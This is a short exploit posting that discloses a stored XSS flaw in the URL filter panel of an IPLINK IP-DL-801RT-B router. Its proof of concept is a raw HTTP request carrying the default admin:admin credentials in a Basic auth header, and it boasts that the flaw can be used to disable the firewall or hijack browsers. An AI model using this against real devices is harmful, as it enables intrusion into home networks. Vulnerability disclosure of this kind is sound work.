facebook facebook twitter rss

IPLINK IP-DL-801RT-B (Url Filter Configuration Panel) Stored XSS

Author: Xodiak , Published: 15-05-2015
# Exploit Title: IPLINK IP-DL-801RT-B (Url Filter Configuration Panel) Stored XSS
# Google Dork: N/A
# Date: 13/05/2015
# Exploit Author: Xodiak xodiak.blackhat@gmail.com
# Vendor Homepage: http://iplink.com.tw
# Software Link: N/A
# Version: All Version
# Tested on: Kali Linux
# CVE : N/A
#
Interductions:
A Stored XSS Vulnerability In Url Filter Configuration Panel Discovered.

If Any JavaScript Code Add In Form Can Open Ports , Enable UPNP , Disable Firewall ,Hijack Bowser By Beef And,etc..

This Can Harm System And Modem :)

POC:
http://192.168.1.1/url_nokeyword.htm

GET /url_nokeyword.htm HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/code.htm
Authorization: Basic YWRtaW46YWRtaW4=
Connection: keep-alive

HTTP/1.1 200 OK
Server: Virtual Web 0.9
Content-Length: 2690



===================
Greetz :
=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza Attacker,MMA Defacer,END3R
Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-=

Like us on Facebook :